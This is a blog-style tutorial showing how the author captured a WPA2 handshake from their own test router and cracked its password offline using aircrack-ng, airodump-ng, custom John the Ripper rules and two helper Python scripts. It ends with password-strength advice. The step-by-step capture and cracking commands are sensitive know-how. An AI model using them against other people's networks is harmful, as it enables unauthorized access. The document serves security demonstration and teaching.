Cracking WPA2 Passwords

I wanted to demo for a client how easy it would be to crack a WiFi network with a simple password. So I set up a Linksys EA3500 router (flashed with LEDE) and configured it to use a variation (changed capitalization and punctuation on the end) of a simple password from Twitter's banned password list. Twitter's list is made up of the passwords it has seen overused, and it's short, so it makes for fast cracking!

Also, NIST's new guidelines on passwords (SP 800-63B, which calls them memorized secrets) specifically recommend checking new passwords against lists of values from previous breaches and of commonly used words (see section 5.1.1.2), because that's exactly what an attacker will do.

Prerequisites

Hardware

To make WPA2 cracking work, you first need a wireless chipset and driver that support monitor mode, so the card can capture every frame on a channel rather than only the traffic of the network it is joined to. Aircrack-ng has an extensive page describing which chipsets work. I've had good luck using cards with Atheros or Intel chipsets in the past.

Software

You'll need to install the aircrack-ng package. For Fedora:

dnf install aircrack-ng

Collection

WPA2-PSK passwords can only be cracked offline if you capture the 4-way handshake (the EAPOL key exchange between the client and the router) when a device connects; in practice the cracker needs at least message 2 of the four plus message 1 or 3. Aircrack-ng includes aireplay-ng, which can force a connected client to re-authenticate by sending it deauthentication frames, but since this was a demo, I just had my smartphone connect when I needed it.

  1. First disable NetworkManager (and/or wpa_supplicant): systemctl stop NetworkManager.service This releases control of the wireless card so that we can manipulate it. (airmon-ng check kill does the same job by killing every process that airmon-ng knows interferes with monitor mode.)
  2. Find out which interface is your wireless card: iwconfig and grab the interface name on the left. My output looks something like this:
lo        no wireless extensions.

enp1s11   no wireless extensions.

wls3      IEEE 802.11  ESSID:"MyHomeNetwork"
          Mode:Managed  Frequency:2.437 GHz  Access Point: 12:34:56:78:9A:BC
          Bit Rate=115.6 Mb/s   Tx-Power=14 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=56/70  Signal level=-54 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:35  Invalid misc:67   Missed beacon:0
  3. Now that we know my wireless card is wls3, we can use an aircrack-ng script to put the wireless card in monitor mode (so that it can sniff all wireless frames on a channel): airmon-ng start wls3 Note that the interface name changes after this step; airmon-ng prints the new one (here it became wls3mon).
  4. With monitor mode enabled, we now passively scan the airwaves: airodump-ng wls3mon
  5. airodump-ng is now channel hopping to detect all wireless networks in range. We only want to target one of them. Take note in the airodump-ng output of the BSSID and channel number of the desired network. Hit CTRL-C to stop airodump.
  6. Run airodump-ng again, locked to that channel and BSSID and saving the results: airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w TestWPA2 wls3mon airodump saves several data files in the current directory with the prefix "TestWPA2", appending a number (starting at 01) to each file name. We need the packet capture file, "TestWPA2-01.cap", for the cracking later. (Note: if you ran airodump with '-w' multiple times, you will have more than one numbered file; aircrack-ng accepts several capture files on one command line, so pass all of them, e.g. TestWPA2-*.cap.)
  7. Capture a handshake. It's at this point that I had my smartphone connect to the target network. In airodump, you should see a new station listing pop up.
  8. Once you have captured the authentication (airodump tells you by putting "WPA handshake: <BSSID>" on the top status line), you can stop the collection with CTRL-C. If aircrack-ng later complains that the file holds no valid handshake, repeat this step and reconnect the client.
  9. We don't need monitor mode anymore. You can disable it: airmon-ng stop wls3mon
  10. Re-enable NetworkManager: systemctl start NetworkManager.service
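
Before tearing down the capture it is worth confirming that the .cap really holds a usable handshake rather than trusting the status banner alone. The following Python script is an added example, not part of the original post or of aircrack-ng: it reads a classic pcap (link type 105, which airodump-ng writes by default, or 127 with a radiotap header), classifies each unencrypted EAPOL-Key frame as 4-way handshake message 1 to 4 from its Key Information bits, and reports per BSSID/station pair whether message 2 plus message 1 or 3 is present, which is what an offline crack needs (the client's SNonce and MIC, plus the AP's ANonce). The sample capture at the bottom is constructed inside the script with zeroed nonces and MICs so that it runs offline; the BSSID 11:22:33:44:55:66 is the placeholder used above and aa:bb:cc:dd:ee:ff is a made-up station address.

```python
"""Check that an airodump-ng .cap holds a usable WPA2 4-way handshake.
Added example (not from the original post or aircrack-ng): classifies each
unencrypted EAPOL-Key frame as handshake message 1-4 from its Key Information
bits and reports, per BSSID/station pair, whether message 2 plus 1 or 3 exists."""
import struct
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105      # airodump-ng's default .cap link type
LINKTYPE_RADIOTAP = 127        # 802.11 frames prefixed with a radiotap header
SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")   # LLC/SNAP header with EtherType 0x888E
KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0040, 0x0080, 0x0100, 0x0200  # Key Information bits

def classify_eapol_key(key_info: int, key_data_len: int) -> int:
    """Map Key Information flags to handshake message number 1..4 (0 = not a handshake message)."""
    ack, mic = key_info & KI_ACK, key_info & KI_MIC
    if ack and not mic:
        return 1
    if ack and mic and key_info & KI_INSTALL:
        return 3
    if mic and not ack:
        # WPA2 (RSN) sets Secure in M4; WPA (TKIP) does not, but its M4 carries no key data.
        return 4 if (key_info & KI_SECURE or key_data_len == 0) else 2
    return 0

def iter_pcap_frames(data: bytes):
    """Yield (linktype, frame) for each record of a classic (not pcapng) pcap file."""
    magic = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}
    if data[:4] not in magic:
        raise ValueError("not a classic pcap file")
    endian = magic[data[:4]]
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "I", data[off + 8:off + 12])[0]
        yield linktype, data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len

def parse_eapol_key(linktype: int, frame: bytes):
    """Return (bssid, station, message_no) for an EAPOL-Key data frame, else None."""
    if linktype == LINKTYPE_RADIOTAP:
        frame = frame[struct.unpack("<H", frame[2:4])[0]:]      # strip the radiotap header
    elif linktype != LINKTYPE_IEEE802_11:
        return None
    fc = struct.unpack("<H", frame[:2])[0] if len(frame) >= 24 else 0
    ftype, subtype, flags = (fc >> 2) & 3, (fc >> 4) & 0xF, fc >> 8
    if ftype != 2 or flags & 0x40:       # not a data frame, or Protected bit set (encrypted)
        return None
    to_ds, from_ds = flags & 0x01, flags & 0x02
    hdr_len = 24 + (2 if subtype & 0x8 else 0) + (6 if to_ds and from_ds else 0)  # QoS / 4-addr
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    # ToDS: client -> AP (a1 = BSSID); FromDS: AP -> client (a2 = BSSID); otherwise IBSS/WDS
    bssid, station = (a1, a2) if to_ds and not from_ds else (a2, a1) if from_ds and not to_ds else (a3, a2)
    body = frame[hdr_len:]
    # 8 bytes LLC/SNAP, 4 bytes EAPOL header (type 3 = Key), 95 bytes of fixed EAPOL-Key fields
    if body[:8] != SNAP_EAPOL or len(body) < 8 + 4 + 95 or body[9] != 3:
        return None
    eapol = body[8:]
    key_info = struct.unpack(">H", eapol[5:7])[0]
    key_data_len = struct.unpack(">H", eapol[97:99])[0]
    return bssid.hex(":"), station.hex(":"), classify_eapol_key(key_info, key_data_len)

def handshake_report(pcap: bytes) -> dict:   # {(bssid, station): {message numbers seen}}
    seen = defaultdict(set)
    for linktype, frame in iter_pcap_frames(pcap):
        parsed = parse_eapol_key(linktype, frame)
        if parsed and parsed[2]:
            seen[(parsed[0], parsed[1])].add(parsed[2])
    return dict(seen)

def crackable(messages: set) -> bool:
    """Offline cracking needs the client's M2 plus an ANonce from M1 or M3."""
    return 2 in messages and bool(messages & {1, 3})

# --- Constructed sample capture: nonces and MICs are all zero, so this is not a real handshake ---
def eapol_key_frame(bssid: bytes, sta: bytes, from_ap: bool, key_info: int, key_data: bytes) -> bytes:
    fc = struct.pack("<H", 0x0088 | (0x0200 if from_ap else 0x0100))   # QoS data, FromDS or ToDS
    a1, a2 = (sta, bssid) if from_ap else (bssid, sta)
    hdr = fc + b"\x00\x00" + a1 + a2 + bssid + b"\x00\x00" + b"\x00\x00"  # duration, addrs, seq, QoS
    key = bytes([2]) + struct.pack(">H", key_info) + b"\x00\x10" + bytes(88)  # RSN descriptor, zeroed fields
    key += struct.pack(">H", len(key_data)) + key_data
    return hdr + SNAP_EAPOL + bytes([2, 3]) + struct.pack(">H", len(key)) + key

def build_pcap(frames, linktype: int = LINKTYPE_IEEE802_11) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)   # pcap global header
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f                # ts_sec, ts_usec, lens
    return out

AP, PHONE = bytes.fromhex("112233445566"), bytes.fromhex("aabbccddeeff")      # placeholder addresses
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")         # CCMP/CCMP/PSK RSN IE
SAMPLE_CAP = build_pcap([
    eapol_key_frame(AP, PHONE, True, 0x008A, b""),        # M1: Pairwise | Ack
    eapol_key_frame(AP, PHONE, False, 0x010A, RSN_IE),    # M2: Pairwise | MIC
    eapol_key_frame(AP, PHONE, True, 0x13CA, bytes(56)),  # M3: Install | Ack | MIC | Secure | EncKeyData
    eapol_key_frame(AP, PHONE, False, 0x030A, b""),       # M4: Pairwise | MIC | Secure
])

if __name__ == "__main__":
    print({k: (sorted(v), crackable(v)) for k, v in handshake_report(SAMPLE_CAP).items()})
```

Run it as-is to see the constructed sample reported as crackable, or replace SAMPLE_CAP with open("TestWPA2-01.cap", "rb").read() to check a real capture. The pcap walker is deliberately minimal: it understands the classic pcap format airodump-ng writes, not pcapng, and it skips frames with the Protected bit set, since the messages of the initial 4-way handshake are always sent in the clear. A report that lists only message 1 for your station means the capture started too late or the client never answered, and you need to reconnect the client and capture again.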

Cracking

Now that we have our data, we can crack off-line.

John the Ripper

The John the Ripper package in most distributions is Openwall's stock "core" release. Most new cracking formats, including the WPA-PSK support used below, land in the community "jumbo" version, and the bleeding-jumbo branch is where that development happens (someone else has shared a great cheat sheet on how to build and operate John).

  1. git clone -b bleeding-jumbo https://github.com/magnumripper/JohnTheRipper.git
  2. cd JohnTheRipper/src
  3. ./configure (this needs the OpenSSL development headers; on Fedora that is the openssl-devel package)
  4. Build the code: make
  5. Build outputs are in ../run, so cd ../run

John the Ripper Rules

I wanted John to try more variations than the default rules allow. Specifically, I wanted it to toggle the case of every letter (the default wordlist rules only try a handful of case patterns, such as capitalizing the first character) AND append punctuation and numbers to the end of each dictionary word. So I had to add a rule set of my own.

John's rule language is not very clear... it's not obvious what is happening at each step. But between the official documentation (doc/RULES in the source tree) and some examples, I pieced it together. Here's what I added to my john.conf file (it's in the default run directory):

[List.Rules:Spotlight]
# Adapted from the "Toggle case everywhere (up to length 8)" block in the
# stock john.conf, which assumes that the simple case combinations (the word
# unchanged, first letter capitalized, all upper, all lower) were already
# tried by the default rules.
#
# Reading a line: -c applies the rule only for case-sensitive hashes (WPA-PSK
# is).  T<n> toggles the case of the character at 0-based position n, and the
# Q right after it rejects the word if nothing changed, i.e. the word is
# shorter than n+1 characters or position n is not a letter.  M memorizes the
# word at that point.  The preprocessor expands each [z0], [z1], ... into two
# rules, one toggling that position and one toggling position 'z' (past the
# end of the word, so it changes nothing); all the combinations together cover
# every case pattern of the positions below n.  The final Q rejects the one
# expansion in which every toggle was a no-op, since it would just repeat the
# memorized word.  $[2!3957468.?0] expands into twelve rules, each appending
# one of those characters to the end.
-c T1 Q M T0 Q
-c T2 Q M T[z0] T[z1] Q
-c T3 Q M T[z0] T[z1] T[z2] Q
-c T4 Q M T[z0] T[z1] T[z2] T[z3] Q
-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] Q
-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] $[2!3957468.?0] Q
-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] Q
-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] $[2!3957468.?0] Q
-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] Q
-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] $[2!3957468.?0] Q
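
To see exactly which candidates the Spotlight rules generate, here is a small interpreter for just the subset of John's rule language they use. It is an added example written for this page, not code from John the Ripper or from the original post; the semantics it implements (T toggling the character at a 0-based position, with 'z' as a no-op; Q rejecting the word unless it differs from the memorized word, which starts out as the input word; M; $ appending one character; and the preprocessor's [...] expansion) follow doc/RULES, and it only accepts rules written with spaces between commands, as they are above. Running it with the Spotlight rules over your own dictionary shows the candidate list John will feed to the cracker.

```python
"""Tiny interpreter for the subset of John the Ripper's rule language used in
the Spotlight rules above, so the exact candidate list can be inspected.

Added example, not John's own code or the post's.  Supported: the -c flag,
T<pos> (toggle case at a 0-based position; 'z' means past the end, a no-op),
M (memorize), Q (reject unless the word differs from the memorized one, which
starts as the input word), $<c> (append a character) and [...] preprocessor
expansion.  Commands must be separated by spaces, as in the post's rules.
"""
import itertools
import re
from typing import Iterator, List, Optional

SPOTLIGHT_RULES = """
-c T1 Q M T0 Q
-c T2 Q M T[z0] T[z1] Q
-c T3 Q M T[z0] T[z1] T[z2] Q
-c T4 Q M T[z0] T[z1] T[z2] T[z3] Q
-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] Q
-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] $[2!3957468.?0] Q
-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] Q
-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] $[2!3957468.?0] Q
-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] Q
-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] $[2!3957468.?0] Q
"""


def preprocess(rule: str) -> Iterator[str]:
    """Expand every [abc] into one rule per character; several classes multiply out."""
    parts = re.split(r"(\[[^\]]*\])", rule)
    choices = [list(p[1:-1]) if p.startswith("[") else [p] for p in parts]
    for combo in itertools.product(*choices):
        yield "".join(combo)


def toggle(word: str, pos: str) -> str:
    """T command: flip the case at pos; 'z' or a position past the end leaves the word alone."""
    if pos == "z" or int(pos) >= len(word):
        return word
    i = int(pos)
    return word[:i] + word[i].swapcase() + word[i + 1:]


def apply_rule(rule: str, word: str) -> Optional[str]:
    """Run one preprocessed, space-separated rule; None means the word was rejected."""
    tokens = rule.split()
    if tokens and tokens[0] == "-c":     # WPA-PSK is case-sensitive, so the rule applies
        tokens = tokens[1:]
    cur = memory = word                  # Q with no earlier M compares against the input word
    for tok in tokens:
        cmd, arg = tok[0], tok[1:]
        if cmd == "T" and len(arg) == 1:
            cur = toggle(cur, arg)
        elif cmd == "M" and not arg:
            memory = cur
        elif cmd == "Q" and not arg:
            if cur == memory:
                return None
        elif cmd == "$" and len(arg) == 1:
            cur += arg
        else:
            raise ValueError(f"unsupported rule command {tok!r}")
    return cur


def candidates(word: str, rules: str = SPOTLIGHT_RULES) -> List[str]:
    """Every distinct candidate the rule set derives from one wordlist entry, in rule order."""
    out: List[str] = []
    seen = set()
    for line in rules.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for expanded in preprocess(line):
            cand = apply_rule(expanded, word)
            if cand is not None and cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


if __name__ == "__main__":
    for w in ("pass", "password"):
        cs = candidates(w)
        print(f"{w}: {len(cs)} candidates, e.g. {cs[:3]} ... {cs[-2:]}")
```

Two things the output makes obvious. First, every line toggles position n together with some subset of the positions below it, so variants that change only the first letter or that only append a character ("Password", "password!") are never produced; the stock john.conf leaves those to the default rules, and a run with --rules=Spotlight alone does not try them. Second, because each append line starts with T5 Q or higher, words shorter than six characters get case toggles only and no suffix, so a short banned word with a trailing digit would be missed. For an eight-letter, all-lowercase word such as "password" the set yields 2,935 candidates, which is why a few hundred dictionary words still crack in seconds.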

Do the crack

  1. Grab a dictionary to crack with (like Twitter's banned list). These are all the passwords which we will try variations on.
  2. To enumerate all the candidate passwords (just on stdout, as a sanity check), execute ./john --config=john.conf --rules=Spotlight --wordlist=../../Downloads/twitter-banned.txt --stdout
  3. Now, send them to aircrack-ng (-w - tells it to read the wordlist from stdin, and -b selects the target network by the BSSID noted during collection): ./john --config=john.conf --rules=Spotlight --wordlist=../../Downloads/twitter-banned.txt --stdout | aircrack-ng -w - -b 11:22:33:44:55:66 TestWPA2-01.cap
  4. Or... bleeding jumbo also has WPA-PSK cracking support, which lets John do the work itself and record the result in its pot file. But you have to do it in 2 steps:
    1. Extract the WPA handshakes into John's input format: ./wpapcap2john ~/TestWPA2-01.cap > wpa.john.txt
    2. Now crack: ./john --config=john.conf --rules=Spotlight --wordlist=../../Downloads/twitter-banned.txt wpa.john.txt

Mitigation

WPA2 is really very secure... if a good password is used (and devices are updated against the KRACK attacks, but that's for another posting). Remember what made this demo work: the handshake can be captured passively by anyone in radio range, and the guessing then happens offline against the capture with no lockout or rate limit, so the pre-shared key has to survive an unlimited number of guesses. If using WPA2-PSK (the password/pre-shared key version), make sure the password isn't on any common password list and isn't a simple variation of one, since rules like the ones above cover changed capitalization and a trailing digit or punctuation mark almost for free. NIST recommends long passwords. I recommend passphrases (at least 4 words) with some mixed-in punctuation.
